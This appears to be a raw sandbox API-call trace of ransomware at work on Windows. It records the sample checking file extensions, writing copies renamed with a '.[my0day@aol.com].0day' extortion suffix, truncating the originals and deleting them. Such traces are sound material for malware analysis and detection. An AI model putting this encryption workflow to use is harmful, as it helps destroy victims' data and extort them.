(lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml") returned 79 [0034.112] lstrlenW (lpString=".zip") returned 4 [0034.112] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.112] lstrlenW (lpString=".rar") returned 4 [0034.112] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.112] lstrlenW (lpString=".bz2") returned 4 [0034.112] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.112] lstrlenW (lpString=".7z") returned 3 [0034.112] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.112] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml") returned 79 [0034.112] lstrlenW (lpString=".dbf") returned 4 [0034.112] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.112] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml") returned 79 [0034.112] lstrlenW (lpString=".1cd") returned 4 [0034.112] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.112] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml") returned 79 [0034.112] lstrlenW (lpString=".jpg") returned 4 [0034.112] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.112] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml") returned 79 [0034.112] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml") returned 79 [0034.112] lstrlenW (lpString=".doc") returned 4 [0034.112] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.112] lstrlenW (lpString=".docx") returned 5 [0034.112] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0034.112] lstrlenW (lpString=".pdf") returned 4 [0034.112] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.112] lstrlenW (lpString=".xls") returned 4 [0034.113] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.113] lstrlenW (lpString=".xlsx") returned 5 [0034.113] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0034.113] lstrlenW (lpString=".ppt") returned 4 [0034.113] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.113] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml") returned 79 [0034.113] lstrlenW (lpString=".zip") returned 4 [0034.113] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.113] lstrlenW (lpString=".rar") returned 4 [0034.113] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.113] lstrlenW (lpString=".bz2") returned 4 [0034.113] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.113] lstrlenW (lpString=".7z") returned 3 [0034.113] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.113] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml") returned 79 [0034.113] lstrlenW (lpString=".dbf") returned 4 [0034.113] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.113] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml") returned 79 [0034.113] lstrlenW (lpString=".1cd") returned 4 [0034.113] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.113] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml") returned 79 [0034.113] lstrlenW (lpString=".jpg") returned 4 [0034.113] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.113] lstrcmpiW (lpString1=".xml", lpString2=".0day") returned 1 [0034.113] lstrlenW (lpString="OutlookMUI.xml") returned 14 [0034.113] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0034.117] GetFileSizeEx (in: hFile=0x184, lpFileSize=0x22dff1c | out: lpFileSize=0x22dff1c*=3186) returned 1 [0034.117] CloseHandle (hObject=0x184) returned 1 [0034.118] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml")) returned 0x2020 [0034.119] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0034.119] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0034.119] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0034.119] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0034.119] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0034.119] GetLastError () returned 0x0 [0034.119] ReadFile (in: hFile=0x184, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0xc72, lpOverlapped=0x0) returned 1 [0034.120] WriteFile (in: hFile=0x188, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0xc80, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0xc80, lpOverlapped=0x0) returned 1 [0034.121] ReadFile (in: hFile=0x184, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x0, lpOverlapped=0x0) returned 1 [0034.121] WriteFile (in: hFile=0x188, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0xf0, lpOverlapped=0x0) returned 1 [0034.121] SetEndOfFile (hFile=0x188) returned 1 [0034.122] CloseHandle (hObject=0x188) returned 1 [0034.122] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0034.122] SetEndOfFile (hFile=0x184) returned 1 [0034.123] CloseHandle (hObject=0x184) returned 1 [0034.123] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x2020) returned 1 [0034.123] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml")) returned 1 [0034.123] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml") returned 77 [0034.124] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml") returned 77 [0034.124] lstrlenW (lpString=".doc") returned 4 [0034.124] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.124] lstrlenW (lpString=".docx") returned 5 [0034.124] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0034.124] lstrlenW (lpString=".pdf") returned 4 [0034.124] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.124] lstrlenW (lpString=".xls") returned 4 [0034.124] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.124] lstrlenW (lpString=".xlsx") returned 5 [0034.124] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0034.124] lstrlenW (lpString=".ppt") returned 4 [0034.124] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.124] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml") returned 77 [0034.124] lstrlenW (lpString=".zip") returned 4 [0034.124] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.124] lstrlenW (lpString=".rar") returned 4 [0034.124] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.124] lstrlenW (lpString=".bz2") returned 4 [0034.124] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.124] lstrlenW (lpString=".7z") returned 3 [0034.124] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.124] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml") returned 77 [0034.124] lstrlenW (lpString=".dbf") returned 4 [0034.124] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.124] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml") returned 77 [0034.124] lstrlenW (lpString=".1cd") returned 4 [0034.124] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.124] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml") returned 77 [0034.124] lstrlenW (lpString=".jpg") returned 4 [0034.124] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.124] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml") returned 77 [0034.125] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml") returned 77 [0034.125] lstrlenW (lpString=".doc") returned 4 [0034.125] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.125] lstrlenW (lpString=".docx") returned 5 [0034.125] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0034.125] lstrlenW (lpString=".pdf") returned 4 [0034.125] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.125] lstrlenW (lpString=".xls") returned 4 [0034.125] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.125] lstrlenW (lpString=".xlsx") returned 5 [0034.125] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0034.125] lstrlenW (lpString=".ppt") returned 4 [0034.125] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.125] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml") returned 77 [0034.125] lstrlenW (lpString=".zip") returned 4 [0034.125] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.125] lstrlenW (lpString=".rar") returned 4 [0034.125] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.125] lstrlenW (lpString=".bz2") returned 4 [0034.125] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.125] lstrlenW (lpString=".7z") returned 3 [0034.125] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.125] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml") returned 77 [0034.125] lstrlenW (lpString=".dbf") returned 4 [0034.125] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.125] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml") returned 77 [0034.125] lstrlenW (lpString=".1cd") returned 4 [0034.125] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.125] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml") returned 77 [0034.125] lstrlenW (lpString=".jpg") returned 4 [0034.125] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.125] lstrcmpiW (lpString1=".xml", lpString2=".0day") returned 1 [0034.126] lstrlenW (lpString="Setup.xml") returned 9 [0034.126] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0034.126] GetFileSizeEx (in: hFile=0x184, lpFileSize=0x22dff1c | out: lpFileSize=0x22dff1c*=4207) returned 1 [0034.126] CloseHandle (hObject=0x184) returned 1 [0034.126] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020 [0034.126] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0034.126] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0034.126] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0034.126] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0034.126] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0034.127] GetLastError () returned 0x0 [0034.127] ReadFile (in: hFile=0x184, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x106f, lpOverlapped=0x0) returned 1 [0034.128] WriteFile (in: hFile=0x188, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0x1070, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0x1070, lpOverlapped=0x0) returned 1 [0034.129] ReadFile (in: hFile=0x184, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x0, lpOverlapped=0x0) returned 1 [0034.129] WriteFile (in: hFile=0x188, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0xe6, lpOverlapped=0x0) returned 1 [0034.129] SetEndOfFile (hFile=0x188) returned 1 [0034.129] CloseHandle (hObject=0x188) returned 1 [0034.130] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0034.130] SetEndOfFile (hFile=0x184) returned 1 [0034.131] CloseHandle (hObject=0x184) returned 1 [0034.131] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x2020) returned 1 [0034.131] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0034.131] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.131] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.131] lstrlenW (lpString=".doc") returned 4 [0034.131] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.131] lstrlenW (lpString=".docx") returned 5 [0034.131] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0034.131] lstrlenW (lpString=".pdf") returned 4 [0034.131] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.131] lstrlenW (lpString=".xls") returned 4 [0034.131] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.131] lstrlenW (lpString=".xlsx") returned 5 [0034.131] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0034.132] lstrlenW (lpString=".ppt") returned 4 [0034.132] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.132] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.132] lstrlenW (lpString=".zip") returned 4 [0034.132] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.132] lstrlenW (lpString=".rar") returned 4 [0034.132] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.132] lstrlenW (lpString=".bz2") returned 4 [0034.132] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.132] lstrlenW (lpString=".7z") returned 3 [0034.132] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.132] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.132] lstrlenW (lpString=".dbf") returned 4 [0034.132] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.132] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.132] lstrlenW (lpString=".1cd") returned 4 [0034.132] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.132] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.132] lstrlenW (lpString=".jpg") returned 4 [0034.132] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.132] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.132] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.132] lstrlenW (lpString=".doc") returned 4 [0034.132] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.132] lstrlenW (lpString=".docx") returned 5 [0034.132] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0034.132] lstrlenW (lpString=".pdf") returned 4 [0034.132] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.132] lstrlenW (lpString=".xls") returned 4 [0034.132] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.132] lstrlenW (lpString=".xlsx") returned 5 [0034.132] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0034.132] lstrlenW (lpString=".ppt") returned 4 [0034.133] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.133] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.133] lstrlenW (lpString=".zip") returned 4 [0034.133] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.133] lstrlenW (lpString=".rar") returned 4 [0034.133] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.133] lstrlenW (lpString=".bz2") returned 4 [0034.133] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.133] lstrlenW (lpString=".7z") returned 3 [0034.133] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.133] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.133] lstrlenW (lpString=".dbf") returned 4 [0034.133] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.133] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.133] lstrlenW (lpString=".1cd") returned 4 [0034.133] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.133] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.133] lstrlenW (lpString=".jpg") returned 4 [0034.133] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.133] lstrcmpiW (lpString1=".xml", lpString2=".0day") returned 1 [0034.133] lstrlenW (lpString="Setup.xml") returned 9 [0034.133] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0034.134] GetFileSizeEx (in: hFile=0x184, lpFileSize=0x22dff1c | out: lpFileSize=0x22dff1c*=2424) returned 1 [0034.134] CloseHandle (hObject=0x184) returned 1 [0034.134] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020 [0034.134] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0034.134] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0034.134] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0034.134] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0034.134] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0034.136] GetLastError () returned 0x0 [0034.136] ReadFile (in: hFile=0x184, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x978, lpOverlapped=0x0) returned 1 [0034.137] WriteFile (in: hFile=0x190, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0x980, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0x980, lpOverlapped=0x0) returned 1 [0034.138] ReadFile (in: hFile=0x184, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x0, lpOverlapped=0x0) returned 1 [0034.138] WriteFile (in: hFile=0x190, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0xe6, lpOverlapped=0x0) returned 1 [0034.138] SetEndOfFile (hFile=0x190) returned 1 [0034.138] CloseHandle (hObject=0x190) returned 1 [0034.139] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0034.139] SetEndOfFile (hFile=0x184) returned 1 [0034.140] CloseHandle (hObject=0x184) returned 1 [0034.140] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x2020) returned 1 [0034.140] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0034.140] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.140] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.140] lstrlenW (lpString=".doc") returned 4 [0034.140] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.140] lstrlenW (lpString=".docx") returned 5 [0034.140] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0034.140] lstrlenW (lpString=".pdf") returned 4 [0034.140] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.140] lstrlenW (lpString=".xls") returned 4 [0034.140] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.140] lstrlenW (lpString=".xlsx") returned 5 [0034.140] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0034.140] lstrlenW (lpString=".ppt") returned 4 [0034.140] lstrcmpiW (lpString1=".ppt", lpString2=".xml") 